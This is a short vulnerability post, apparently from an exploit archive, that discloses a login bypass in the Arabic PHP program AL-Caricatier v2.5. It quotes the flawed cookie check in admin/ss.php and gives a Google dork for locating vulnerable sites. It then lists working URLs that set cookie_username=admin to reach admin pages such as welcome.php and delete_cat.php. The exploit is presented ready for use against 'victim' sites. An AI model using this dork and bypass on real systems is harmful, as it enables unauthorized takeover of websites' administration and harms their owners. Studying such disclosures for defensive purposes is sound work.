Vulnerability in AL-Caricatier,V.2.5

Hello...
i found a vulneribility in an program called AL-Caricatier it's an

arabic program

site:
http://www.php-ar.com

Vulnerability:
Login Bypass

GoogleDork:
inurl:view_caricatier. php

Vunlerability in an included file called ss.php which resides in

the admin directory...

if($cookie_username){
echo"";
}else{
echo"<font face='tahoma' size='2'>You Didn't Sign in äå Êâå ÈÊÓÌêä

ÇäÏÎèä</b>";
echo"<meta http-equiv='Refresh' content='1;

url=admin_login.php'>";
EXIT;
}

the admin directory is protected user and password but u can

bypass them by going to this link:

www.victim.com/view_caricatier.php<http://www.victim.com/view_caricatier.php>

To bypass:
www.victim.com/admin/welcome.php?cookie_username=admin<http://www.victim.com/admin/welcome.php?cookie_username=admin>
or any of the admin files instead of welcome.php
like :
add-flashFile.php
caricatier_add.php
delete_cat.php

and u r in the admin interface...




--
(r).....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF
Genuises....(c)